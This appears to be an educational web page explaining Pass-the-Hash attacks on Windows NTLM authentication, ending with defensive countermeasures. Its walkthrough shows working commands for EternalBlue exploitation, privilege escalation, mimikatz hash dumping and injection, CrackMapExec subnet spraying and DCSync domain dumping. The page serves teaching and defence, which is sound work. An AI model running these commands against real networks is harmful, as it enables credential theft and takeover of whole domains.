ATT&CK Technique T1550.002 - Credential Access

PASS-THE-HASH

A credential theft technique that uses captured NTLM password hashes to authenticate as a user - without ever knowing the plaintext password.

CRITICAL SEVERITY - LATERAL MOVEMENT VECTOR
Primary Protocol
NTLM
NT LAN Manager challenge-response authentication used extensively in Windows environments
Attack Category
LATERAL
Enables movement across systems without cracking or knowing the original password
First Documented
1997
Described by Paul Ashton - remains highly effective in modern Windows domain environments
01

Anatomy of an NTLM Hash

Hover over the components of a credential dump entry to inspect each field:

Administrator USERNAME - Account name on target system : 500 RID - Relative Identifier (500 = built-in Administrator) : aad3b435b51404eeaad3b435b51404ee LM HASH - Disabled/empty (all same = no LM hash stored). Historically very weak. : 8846f7eaee8fb117ad06bdd830b7586c NT HASH ← THIS IS WHAT ATTACKERS USE. MD4 hash of UTF-16LE encoded password. :::
Username : RID
LM Hash (often disabled)
NT Hash ← weaponized

KEY INSIGHT: NTLM authentication never transmits the password - it uses the hash directly in a challenge-response exchange. An attacker with the hash can replay this exchange and authenticate as the victim.

02

Attack Flow Overview

🖥️ ATTACKER COMPROMISED HOST DUMP 🗄️ LSASS/SAM HASH EXTRACTION STOLEN 🔑 NT HASH 8846f7ea... INJECT PtH TOOL Mimikatz/Impacket AUTH 🖧 TARGET PWNED ① INITIAL ACCESS ② CREDENTIAL DUMP ③ HARVEST HASH ④ INJECT HASH ⑤ LATERAL MOVE LATERAL MOVEMENT & REPEAT
03

Step-by-Step Walkthrough

Phase 01 - Reconnaissance & Initial Compromise

INITIAL ACCESS

The attacker first gains a foothold on any machine within the target network. This is the prerequisite for all subsequent steps. The method of initial access can vary widely.

  • Phishing email delivers malicious payload or credential harvester
  • Exploitation of unpatched vulnerability (e.g., EternalBlue/MS17-010)
  • Password spray or credential stuffing against VPN/RDP/OWA
  • Supply chain compromise or malicious insider
  • Physical access - USB drop, rogue device on network
attacker@c2 - initial_access.sh
$ nmap -p 445 --script smb-vuln-ms17-010 192.168.1.0/24 Starting Nmap 7.94... Host: 192.168.1.45 VULNERABLE: Remote Code Execution MS17-010: EternalBlue Risk factor: HIGH   $ msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue" msf6> set RHOSTS 192.168.1.45 msf6> run [*] Meterpreter session 1 opened ✓
Phase 02 - Privilege Escalation

FOOTHOLD & PRIVESC

To extract hashes from LSASS (Local Security Authority Subsystem Service), the attacker needs SYSTEM or Administrator-level privileges. Several escalation paths exist on Windows.

  • Token impersonation via Meterpreter getsystem / Incognito
  • UAC bypass (Fodhelper, CMSTP, DLL hijacking)
  • Exploit local kernel vulnerability for SYSTEM access
  • SeDebugPrivilege required to read LSASS process memory
  • SeImpersonatePrivilege - Potato attacks (PrintSpoofer, etc.)
meterpreter - privesc
meterpreter> getuid Server username: CORPjsmith   meterpreter> getsystem ...got system via technique 1 (Named Pipe Impersonation)   meterpreter> getuid Server username: NT AUTHORITYSYSTEM ✓   meterpreter> ps | grep lsass 632 lsass.exe x64 0 NT AUTHORITYSYSTEM
Phase 03 - Credential Access

HASH EXTRACTION

With SYSTEM privileges, the attacker dumps NTLM hashes from LSASS memory or the SAM/NTDS.dit database. These hashes are the "keys" that will be replayed against other systems.

  • Mimikatz sekurlsa::logonpasswords - reads hashes from LSASS memory
  • Mimikatz lsadump::sam - reads from SAM registry hive
  • Impacket secretsdump.py - remote or local hash dumping
  • Windows credential cache (DPAPI protected secrets)
  • NTDS.dit (Active Directory database) holds ALL domain hashes
mimikatz - hash dump
mimikatz # privilege::debug Privilege '20' OK   mimikatz # sekurlsa::logonpasswords   Authentication Id : 0 ; 456280 Session : Interactive UserName : Administrator Domain : CORP NTLM : 8846f7eaee8fb117ad06bdd830b7586c [!] Hash captured - ready for PtH
Phase 04 - Credential Use

PASS THE HASH

The hash is injected directly into an authentication session or used with a tool that speaks NTLM. The NTLM protocol's challenge-response mechanism accepts the hash as-is - no password cracking needed.

  • sekurlsa::pth - spawns a process with forged credentials in memory
  • The spawned process has a valid Kerberos/NTLM token for the victim user
  • Impacket's wmiexec.py / psexec.py accept hash via -hashes flag
  • CrackMapExec automates PtH across entire subnets at once
  • No plaintext password ever needed or used during this phase
mimikatz - pass the hash
mimikatz # sekurlsa::pth /user:Administrator /domain:CORP /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe   user : Administrator domain : CORP program : cmd.exe [+] New process spawned with PtH token ✓ [+] Authenticated as Administrator
Phase 05 - Lateral Movement

LATERAL MOVEMENT

Using the injected hash, the attacker connects to other machines on the network where the account is valid. Domain admin hashes provide access to every machine in the domain.

  • SMB/PSEXEC to run commands on remote hosts via port 445
  • WMI - Windows Management Instrumentation remote execution
  • WinRM - PowerShell Remoting (port 5985/5986)
  • CrackMapExec sprays hash across entire subnets instantly
  • Any host where the compromised user has local admin rights is accessible
crackmapexec - lateral movement
$ cme smb 192.168.1.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c   SMB 192.168.1.10 [*] Windows Server 2019 SMB 192.168.1.10 [+] CORPAdministrator (Pwn3d!) SMB 192.168.1.45 [+] CORPAdministrator (Pwn3d!) SMB 192.168.1.101 [+] CORPAdministrator (Pwn3d!) SMB 192.168.1.200 [-] CORPAdministrator STATUS_LOGON_FAILURE [*] 3/4 hosts compromised
Phase 06 - Domain Dominance

ESCALATION TO DA

The ultimate goal: compromise the Domain Controller and dump NTDS.dit, obtaining hashes for every domain user. The attacker can now impersonate any user in the entire organization.

  • Access DC via PtH with domain admin hash
  • Dump NTDS.dit - Active Directory's password database
  • Create Golden Ticket using krbtgt hash (permanent access)
  • DCSync attack - request hash replication as if a DC
  • Entire domain compromised - all user hashes available for PtH
impacket - domain controller
$ secretsdump.py CORP/Administrator @dc01.corp.local -hashes :8846f7ea...   [*] Dumping Domain Credentials (NTDS.dit) [*] Using the DRSUAPI method (DCSync) Administrator:500:aad3b...:8846f7ea... krbtgt:502:aad3b...:31d6cfe0... jsmith:1105:aad3b...:a87f3a33... ... 847 more accounts ... [!] DOMAIN FULLY COMPROMISED ✓
STEP 1 OF 6
04

Attacker Toolkit

Mimikatz
PRIMARY - PtH TOOL
The gold standard. sekurlsa::pth injects hashes into new processes. Also extracts hashes from LSASS, SAM, and cached credentials.
CrackMapExec
LATERAL MOVEMENT
Automates PtH at scale across entire subnets. Supports SMB, WinRM, MSSQL, LDAP. Identifies where credentials are valid.
Impacket Suite
REMOTE EXECUTION
Python tools: psexec.py, wmiexec.py, smbexec.py all support hash authentication via -hashes flag. secretsdump for NTDS.
Metasploit
EXPLOITATION FRAMEWORK
smb/psexec module accepts NTLM hashes. Hashdump post module extracts SAM hashes after Meterpreter session established.
Rubeus
KERBEROS ATTACKS
Overpass-the-Hash: converts NT hash to Kerberos TGT. Enables Kerberos-based PtH that evades NTLM-focused detection.
Evil-WinRM
WINRM SHELL
Full-featured WinRM shell supporting hash-based authentication. Ideal for interactive sessions on targets with PS Remoting enabled.
05

Defensive Countermeasures

🛡️
Windows Credential Guard
Isolates LSASS in a virtualization-based security container (VSM). Prevents credential extraction from LSASS memory - the primary hash dump vector. Requires TPM + Secure Boot.
🚫
Disable NTLM Authentication
Force Kerberos-only authentication via GPO. Eliminates NTLM PtH entirely. May require significant testing - some legacy apps depend on NTLM. Set NTLMv1 to Refuse.
🔐
Local Admin Password Solution (LAPS)
Randomizes local Administrator passwords on every machine. Prevents a single compromised local admin hash from providing access to all machines in the environment.
📊
Privileged Access Workstations (PAW)
Admins use dedicated, hardened workstations for privileged activity. Reduces attack surface by ensuring admin credentials never touch internet-facing or user systems.
🔍
SIEM Detection Rules
Alert on Event ID 4624 (type 3 logins without Kerberos), unusual process spawning from LSASS, and anomalous SMB lateral movement patterns. Detect Mimikatz process injection via AV/EDR.
🏛️
Protected Users Security Group
Placing privileged accounts in Protected Users prevents NTLM auth entirely for those accounts, forces Kerberos, and prevents credential caching - blocks PtH at the identity level.
🎯
Tier Model / AD Tiering
Enforce a 3-tier Active Directory model: Tier 0 (DCs), Tier 1 (Servers), Tier 2 (Workstations). Credentials from lower tiers cannot be used to access higher tiers, limiting lateral movement scope.
EDR & Attack Surface Reduction
Modern EDR solutions detect Mimikatz via behavioral signatures, memory injection patterns, and LSASS access patterns. ASR rules in Windows Defender block credential stealing from LSASS.